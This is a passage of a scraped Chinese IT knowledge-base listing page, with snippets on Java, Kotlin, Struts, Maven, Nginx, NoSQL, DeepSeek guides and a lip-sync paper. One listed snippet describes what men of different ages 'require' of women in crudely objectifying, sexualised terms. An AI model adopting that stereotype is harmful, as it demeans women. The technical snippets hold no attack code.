taget="_blank" href="/search/talking/1.htm">talking</a><a class="tag" taget="_blank" href="/search/head/1.htm">head</a><a class="tag" taget="_blank" href="/search/talking/1.htm">talking</a><a class="tag" taget="_blank" href="/search/face/1.htm">face</a><a class="tag" taget="_blank" href="/search/3d/1.htm">3d</a> <div>论文题目:MuseTalk:Real-TimeHighQualityLipSynchronizationwithLatentSpaceInpainting论文链接:https://arxiv.org/abs/2410.10122发表于:arXiv2025单位:腾讯、港中文大学代码:https://github.com/TMElyralab/MuseTalk研究背景研究问题:这篇文章要解决的问题是实</div> </li> <li><a href="/article/1893686275878219776.htm" title="清华大学版本deepseek最新最全资料汇总" target="_blank">清华大学版本deepseek最新最全资料汇总</a> <span class="text-muted">2501_90766946</span> <a class="tag" taget="_blank" href="/search/pdf/1.htm">pdf</a> <div>资源链接:https://pan.quark.cn/s/fb7f75ceeee8最近深入学习了很多关于DeepSeek的资料,收获颇丰。这两天看到清华大学出品第三版的DeepSeek使用手册,觉得非常实用,特地推荐给大家看看。手册主要讲了普通人如何抓住deepseek红利,内容干货满满,不会有太多学术术语,适合各个层次的人群,特别是对新手,包括我们一线教师,非常友好。</div> </li> <li><a href="/article/1893678842418098176.htm" title="Kotlin中Retrofit网络请求简单封装" target="_blank">Kotlin中Retrofit网络请求简单封装</a> <span class="text-muted">weixin_34293059</span> <a class="tag" taget="_blank" href="/search/%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91/1.htm">移动开发</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>使用Kotlin简单的对Retrofit+RxJava大多数普通请求进行封装提示:如果对Kotlin,RxLifecycle,Retrofit,RxJava等不太了解的小伙伴可以参考网上的基础资料1.惯例先添加依赖//Retrofitimplementation'com.squareup.retrofit2:retrofit:2.3.0'implementation'com.squareup.re</div> </li> <li><a href="/article/1893678715670425600.htm" title="AIGC从入门到实战:ChatGPT 需要懂得写提示词的人" target="_blank">AIGC从入门到实战:ChatGPT 需要懂得写提示词的人</a> <span class="text-muted">AI天才研究院</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97/1.htm">计算</a><a class="tag" taget="_blank" href="/search/AI%E5%A4%A7%E6%A8%A1%E5%9E%8B%E4%BC%81%E4%B8%9A%E7%BA%A7%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91%E5%AE%9E%E6%88%98/1.htm">AI大模型企业级应用开发实战</a><a class="tag" taget="_blank" href="/search/DeepSeek/1.htm">DeepSeek</a><a class="tag" taget="_blank" href="/search/R1/1.htm">R1</a><a class="tag" taget="_blank" href="/search/%26amp%3B/1.htm">&</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AEAI%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E5%A4%A7%E6%A8%A1%E5%9E%8B/1.htm">大数据AI人工智能大模型</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/kotlin/1.htm">kotlin</a><a class="tag" taget="_blank" href="/search/golang/1.htm">golang</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E5%8E%82%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">大厂程序员</a><a class="tag" taget="_blank" href="/search/%E7%A1%85%E5%9F%BA%E8%AE%A1%E7%AE%97/1.htm">硅基计算</a><a class="tag" taget="_blank" href="/search/%E7%A2%B3%E5%9F%BA%E8%AE%A1%E7%AE%97/1.htm">碳基计算</a><a class="tag" taget="_blank" href="/search/%E8%AE%A4%E7%9F%A5%E8%AE%A1%E7%AE%97/1.htm">认知计算</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E7%89%A9%E8%AE%A1%E7%AE%97/1.htm">生物计算</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/1.htm">神经网络</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/AIGC/1.htm">AIGC</a><a class="tag" taget="_blank" href="/search/AGI/1.htm">AGI</a><a class="tag" taget="_blank" href="/search/LLM/1.htm">LLM</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84%E8%AE%BE%E8%AE%A1/1.htm">系统架构设计</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E5%93%B2%E5%AD%A6/1.htm">软件哲学</a><a class="tag" taget="_blank" href="/search/Agent/1.htm">Agent</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98%E5%AE%9E%E7%8E%B0%E8%B4%A2%E5%AF%8C%E8%87%AA%E7%94%B1/1.htm">程序员实现财富自由</a> <div>AIGC从入门到实战:ChatGPT需要懂得写提示词的人第1章:AIGC概述1.1AIGC的基本概念AIGC(AI-GeneratedContent),即人工智能生成内容,是指利用人工智能技术,如生成对抗网络(GAN)、变分自编码器(VAE)等,生成具有高质量、多样化、个性化的文本、图像、音频等多媒体内容。AIGC技术已经广泛应用于内容创作、智能推荐、游戏开发、虚拟现实等多个领域,极大地提升了内容</div> </li> <li><a href="/article/21.htm" title="矩阵求逆(JAVA)利用伴随矩阵" target="_blank">矩阵求逆(JAVA)利用伴随矩阵</a> <span class="text-muted">qiuwanchi</span> <a class="tag" taget="_blank" href="/search/%E5%88%A9%E7%94%A8%E4%BC%B4%E9%9A%8F%E7%9F%A9%E9%98%B5%E6%B1%82%E9%80%86%E7%9F%A9%E9%98%B5/1.htm">利用伴随矩阵求逆矩阵</a> <div>package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(利用伴随矩阵) * @author 邱万迟 </div> </li> <li><a href="/article/148.htm" title="单例(Singleton)模式" target="_blank">单例(Singleton)模式</a> <span class="text-muted">aoyouzi</span> <a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B/1.htm">单例</a><a class="tag" taget="_blank" href="/search/%E6%A8%A1%E5%BC%8F/1.htm">模式</a><a class="tag" taget="_blank" href="/search/Singleton/1.htm">Singleton</a> <div>3.1 概述 如果要保证系统里一个类最多只能存在一个实例时,我们就需要单例模式。这种情况在我们应用中经常碰到,例如缓存池,数据库连接池,线程池,一些应用服务实例等。在多线程环境中,为了保证实例的唯一性其实并不简单,这章将和读者一起探讨如何实现单例模式。 3.2</div> </li> <li><a href="/article/275.htm" title="[开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发" target="_blank">[开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a> <div> 现在国内有大量的信息技术产品,都是通过盗版,免费下载,开源,附送等方式从国外的开发者那里获得的。。。。。。 虽然这种情况带来了国内信息产业的短暂繁荣,也促进了电子商务和互联网产业的快速发展,但是实际上,我们应该清醒的看到,这些产业的核心力量是被国外的</div> </li> <li><a href="/article/402.htm" title="页面有两个frame,怎样点击一个的链接改变另一个的内容" target="_blank">页面有两个frame,怎样点击一个的链接改变另一个的内容</a> <span class="text-muted">Array_06</span> <a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/XHTML/1.htm">XHTML</a> <div><a src="地址" targets="这里写你要操作的Frame的名字" />搜索 然后你点击连接以后你的新页面就会显示在你设置的Frame名字的框那里 targerts="",就是你要填写目标的显示页面位置 ===================== 例如: <frame src=&</div> </li> <li><a href="/article/529.htm" title="Struts2实现单个/多个文件上传和下载" target="_blank">Struts2实现单个/多个文件上传和下载</a> <span class="text-muted">oloz</span> <a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/struts/1.htm">struts</a> <div>struts2单文件上传: 步骤01:jsp页面 <!--在进行文件上传时,表单提交方式一定要是post的方式,因为文件上传时二进制文件可能会很大,还有就是enctype属性,这个属性一定要写成multipart/form-data,不然就会以二进制文本上传到服务器端--> <form action="fileUplo</div> </li> <li><a href="/article/656.htm" title="推荐10个在线logo设计网站" target="_blank">推荐10个在线logo设计网站</a> <span class="text-muted">362217990</span> <a class="tag" taget="_blank" href="/search/logo/1.htm">logo</a> <div>在线设计Logo网站。 1、http://flickr.nosv.org(这个太简单) 2、http://www.logomaker.com/?source=1.5770.1 3、http://www.simwebsol.com/ImageTool 4、http://www.logogenerator.com/logo.php?nal=1&tpl_catlist[]=2 5、ht</div> </li> <li><a href="/article/783.htm" title="jsp上传文件" target="_blank">jsp上传文件</a> <span class="text-muted">香水浓</span> <a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/fileupload/1.htm">fileupload</a> <div>1. jsp上传 Notice: 1. form表单 method 属性必须设置为 POST 方法 ,不能使用 GET 方法 2. form表单 enctype 属性需要设置为 multipart/form-data 3. form表单 action 属性需要设置为提交到后台处理文件上传的jsp文件地址或者servlet地址。例如 uploadFile.jsp 程序文件用来处理上传的文</div> </li> <li><a href="/article/910.htm" title="我的架构经验系列文章 - 前端架构" target="_blank">我的架构经验系列文章 - 前端架构</a> <span class="text-muted">agevs</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a><a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/jQuer/1.htm">jQuer</a> <div>框架层面:近几年前端发展很快,前端之所以叫前端因为前端是已经可以独立成为一种职业了,js也不再是十年前的玩具了,以前富客户端RIA的应用可能会用flash/flex或是silverlight,现在可以使用js来完成大部分的功能,因此js作为一门前端的支撑语言也不仅仅是进行的简单的编码,越来越多框架性的东西出现了。越来越多的开发模式转变为后端只是吐json的数据源,而前端做所有UI的事情。MVCMV</div> </li> <li><a href="/article/1037.htm" title="android ksoap2 中把XML(DataSet) 当做参数传递" target="_blank">android ksoap2 中把XML(DataSet) 当做参数传递</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>我的android app中需要发送webservice ,于是我使用了 ksop2 进行发送,在测试过程中不是很顺利,不能正常工作.我的web service 请求格式如下 [html] view plain copy <Envelope xmlns="http://schemas.</div> </li> <li><a href="/article/1164.htm" title="使用Spring进行统一日志管理 + 统一异常管理" target="_blank">使用Spring进行统一日志管理 + 统一异常管理</a> <span class="text-muted">baalwolf</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>统一日志和异常管理配置好后,SSH项目中,代码以往散落的log.info() 和 try..catch..finally 再也不见踪影! 统一日志异常实现类: [java] view plain copy package com.pilelot.web.util; impor</div> </li> <li><a href="/article/1291.htm" title="Android SDK 国内镜像" target="_blank">Android SDK 国内镜像</a> <span class="text-muted">BigBird2012</span> <a class="tag" taget="_blank" href="/search/android+sdk/1.htm">android sdk</a> <div>一、镜像地址: 1、东软信息学院的 Android SDK 镜像,比配置代理下载快多了。 配置地址, http://mirrors.neusoft.edu.cn/configurations.we#android 2、北京化工大学的: IPV4:ubuntu.buct.edu.cn IPV4:ubuntu.buct.cn IPV6:ubuntu.buct6.edu.cn </div> </li> <li><a href="/article/1418.htm" title="HTML无害化和Sanitize模块" target="_blank">HTML无害化和Sanitize模块</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/Linky/1.htm">Linky</a><a class="tag" taget="_blank" href="/search/Sanitize/1.htm">Sanitize</a> <div>一.ng-bind-html、ng-bind-html-unsafe AngularJS非常注重安全方面的问题,它会尽一切可能把大多数攻击手段最小化。其中一个攻击手段是向你的web页面里注入不安全的HTML,然后利用它触发跨站攻击或者注入攻击。 考虑这样一个例子,假设我们有一个变量存</div> </li> <li><a href="/article/1545.htm" title="[Maven学习笔记二]Maven命令" target="_blank">[Maven学习笔记二]Maven命令</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a> <div>mvn compile compile编译命令将src/main/java和src/main/resources中的代码和配置文件编译到target/classes中,不会对src/test/java中的测试类进行编译 MVN编译使用 maven-resources-plugin:2.6:resources maven-compiler-plugin:2.5.1:compile &nbs</div> </li> <li><a href="/article/1672.htm" title="【Java命令二】jhat" target="_blank">【Java命令二】jhat</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/Java%E5%91%BD%E4%BB%A4/1.htm">Java命令</a> <div>jhat用于分析使用jmap dump的文件,,可以将堆中的对象以html的形式显示出来,包括对象的数量,大小等等,并支持对象查询语言。 jhat默认开启监听端口7000的HTTP服务,jhat是Java Heap Analysis Tool的缩写 1. 用法: [hadoop@hadoop bin]$ jhat -help Usage: jhat [-stack <bool&g</div> </li> <li><a href="/article/1799.htm" title="JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc" target="_blank">JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc</a> <span class="text-muted">ronin47</span> <div>进到类似目录 server/default/conf/bootstrap,打开文件 profile.xml找到: Xml代码<bean name="AttachmentStore" class="org.jboss.system.server.profileservice.repository.AbstractAtta</div> </li> <li><a href="/article/1926.htm" title="写给初学者的6条网页设计安全配色指南" target="_blank">写给初学者的6条网页设计安全配色指南</a> <span class="text-muted">brotherlamp</span> <a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/ui%E8%87%AA%E5%AD%A6/1.htm">ui自学</a><a class="tag" taget="_blank" href="/search/ui%E8%A7%86%E9%A2%91/1.htm">ui视频</a><a class="tag" taget="_blank" href="/search/ui%E6%95%99%E7%A8%8B/1.htm">ui教程</a><a class="tag" taget="_blank" href="/search/ui%E8%B5%84%E6%96%99/1.htm">ui资料</a> <div>网页设计中最基本的原则之一是,不管你花多长时间创造一个华丽的设计,其最终的角色都是这场秀中真正的明星——内容的衬托 我仍然清楚地记得我最早的一次美术课,那时我还是一个小小的、对凡事都充满渴望的孩子,我摆放出一大堆漂亮的彩色颜料。我仍然记得当我第一次看到原色与另一种颜色混合变成第二种颜色时的那种兴奋,并且我想,既然两种颜色能创造出一种全新的美丽色彩,那所有颜色</div> </li> <li><a href="/article/2053.htm" title="有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。写一个函数实现。复杂度是什么。" target="_blank">有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。写一个函数实现。复杂度是什么。</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a> <div> import java.util.Random; import java.util.Set; import java.util.TreeSet; /** * http://weibo.com/1915548291/z7HtOF4sx * #面试题#有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。 * 写一个函数实现。复杂度是什么</div> </li> <li><a href="/article/2180.htm" title="struts2获得request、session、application方式" target="_blank">struts2获得request、session、application方式</a> <span class="text-muted">chiangfai</span> <a class="tag" taget="_blank" href="/search/application/1.htm">application</a> <div>1、与Servlet API解耦的访问方式。 a.Struts2对HttpServletRequest、HttpSession、ServletContext进行了封装,构造了三个Map对象来替代这三种对象要获取这三个Map对象,使用ActionContext类。 -----> package pro.action; import java.util.Map; imp</div> </li> <li><a href="/article/2307.htm" title="改变python的默认语言设置" target="_blank">改变python的默认语言设置</a> <span class="text-muted">chenchao051</span> <a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div> import sys sys.getdefaultencoding() 可以测试出默认语言,要改变的话,需要在python lib的site-packages文件夹下新建: sitecustomize.py, 这个文件比较特殊,会在python启动时来加载,所以就可以在里面写上: import sys sys.setdefaultencoding('utf-8') &n</div> </li> <li><a href="/article/2434.htm" title="mysql导入数据load data infile用法" target="_blank">mysql导入数据load data infile用法</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E5%AF%BC%E5%85%A5%E6%95%B0%E6%8D%AE/1.htm">导入数据</a> <div>我们常常导入数据!mysql有一个高效导入方法,那就是load data infile 下面来看案例说明 基本语法: load data [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl_name [fields [terminated by't'] [OPTI</div> </li> <li><a href="/article/2561.htm" title="phpexcel导入excel表到数据库简单入门示例" target="_blank">phpexcel导入excel表到数据库简单入门示例</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/Excel/1.htm">Excel</a> <div> 跟导出相对应的,同一个数据表,也是将phpexcel类放在class目录下,将Excel表格中的内容读取出来放到数据库中 <?php error_reporting(E_ALL); set_time_limit(0); ?> <html> <head> <meta http-equiv="Content-Type" </div> </li> <li><a href="/article/2688.htm" title="22岁到72岁的男人对女人的要求" target="_blank">22岁到72岁的男人对女人的要求</a> <span class="text-muted">dcj3sjt126com</span> <div>22岁男人对女人的要求是:一,美丽,二,性感,三,有份具品味的职业,四,极有耐性,善解人意,五,该聪明的时候聪明,六,作小鸟依人状时尽量自然,七,怎样穿都好看,八,懂得适当地撒娇,九,虽作惊喜反应,但看起来自然,十,上了床就是个无条件荡妇。 32岁的男人对女人的要求,略作修定,是:一,入得厨房,进得睡房,二,不必服侍皇太后,三,不介意浪漫蜡烛配盒饭,四,听多过说,五,不再傻笑,六,懂得独</div> </li> <li><a href="/article/2815.htm" title="Spring和HIbernate对DDM设计的支持" target="_blank">Spring和HIbernate对DDM设计的支持</a> <span class="text-muted">e200702084</span> <a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/Hibernate/1.htm">Hibernate</a><a class="tag" taget="_blank" href="/search/%E9%A2%86%E5%9F%9F%E6%A8%A1%E5%9E%8B/1.htm">领域模型</a> <div>A:数据访问对象 DAO和资源库在领域驱动设计中都很重要。DAO是关系型数据库和应用之间的契约。它封装了Web应用中的数据库CRUD操作细节。另一方面,资源库是一个独立的抽象,它与DAO进行交互,并提供到领域模型的“业务接口”。 资源库使用领域的通用语言,处理所有必要的DAO,并使用领域理解的语言提供对领域模型的数据访问服务。</div> </li> <li><a href="/article/2942.htm" title="NoSql 数据库的特性比较" target="_blank">NoSql 数据库的特性比较</a> <span class="text-muted">geeksun</span> <a class="tag" taget="_blank" href="/search/NoSQL/1.htm">NoSQL</a> <div>Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。目前由VMware主持开发工作。 1. 数据模型 作为Key-value型数据库,Redis也提供了键(Key)和值(Value)的映射关系。除了常规的数值或字符串,Redis的键值还可以是以下形式之一: Lists (列表) Sets</div> </li> <li><a href="/article/3069.htm" title="使用 Nginx Upload Module 实现上传文件功能" target="_blank">使用 Nginx Upload Module 实现上传文件功能</a> <span class="text-muted">hongtoushizi</span> <a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a> <div>转载自: http://www.tuicool.com/wx/aUrAzm 普通网站在实现文件上传功能的时候,一般是使用Python,Java等后端程序实现,比较麻烦。Nginx有一个Upload模块,可以非常简单的实现文件上传功能。此模块的原理是先把用户上传的文件保存到临时文件,然后在交由后台页面处理,并且把文件的原名,上传后的名称,文件类型,文件大小set到页面。下</div> </li> <li><a href="/article/3196.htm" title="spring-boot-web-ui及thymeleaf基本使用" target="_blank">spring-boot-web-ui及thymeleaf基本使用</a> <span class="text-muted">jishiweili</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/thymeleaf/1.htm">thymeleaf</a> <div>视图控制层代码demo如下: @Controller @RequestMapping("/") public class MessageController { private final MessageRepository messageRepository; @Autowired public MessageController(Mes</div> </li> <li><a href="/article/3323.htm" title="数据源架构模式之活动记录" target="_blank">数据源架构模式之活动记录</a> <span class="text-muted">home198979</span> <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E6%B4%BB%E5%8A%A8%E8%AE%B0%E5%BD%95/1.htm">活动记录</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E6%98%A0%E5%B0%84/1.htm">数据映射</a> <div>hello!架构 一、概念 活动记录(Active Record):一个对象,它包装数据库表或视图中某一行,封装数据库访问,并在这些数据上增加了领域逻辑。 对象既有数据又有行为。活动记录使用直截了当的方法,把数据访问逻辑置于领域对象中。 二、实现简单活动记录 活动记录在php许多框架中都有应用,如cakephp。 <?php /** * 行数据入口类 *</div> </li> <li><a href="/article/3450.htm" title="Linux Shell脚本之自动修改IP" target="_blank">Linux Shell脚本之自动修改IP</a> <span class="text-muted">pda158</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a><a class="tag" taget="_blank" href="/search/Debian/1.htm">Debian</a><a class="tag" taget="_blank" href="/search/%E8%84%9A%E6%9C%AC/1.htm">脚本</a> <div>作为一名 Linux SA,日常运维中很多地方都会用到脚本,而服务器的ip一般采用静态ip或者MAC绑定,当然后者比较操作起来相对繁琐,而前者我们可以设置主机名、ip信息、网关等配置。修改成特定的主机名在维护和管理方面也比较方便。如下脚本用途为:修改ip和主机名等相关信息,可以根据实际需求修改,举一反三! #!/bin/sh #auto Change ip netmask ga</div> </li> <li><a href="/article/3577.htm" title="开发环境搭建" target="_blank">开发环境搭建</a> <span class="text-muted">独浮云</span> <a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a><a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a> <div> 最近在开发过程中,经常出现MyEclipse内存溢出等错误,需要重启的情况,好麻烦。对于一般的JAVA+TOMCAT项目开发,其实没有必要使用重量级的MyEclipse,使用eclipse就足够了。尤其是开发机器硬件配置一般的人。 &n</div> </li> <li><a href="/article/3704.htm" title="操作日期和时间的工具类" target="_blank">操作日期和时间的工具类</a> <span class="text-muted">vipbooks</span> <a class="tag" taget="_blank" href="/search/%E5%B7%A5%E5%85%B7%E7%B1%BB/1.htm">工具类</a> <div> 大家好啊,好久没有来这里发文章了,今天来逛逛,分享一篇刚写不久的操作日期和时间的工具类,希望对大家有所帮助。 /* * @(#)DataFormatUtils.java 2010-10-10 * * Copyright 2010 BianJing,All rights reserved. */ package test; impor</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>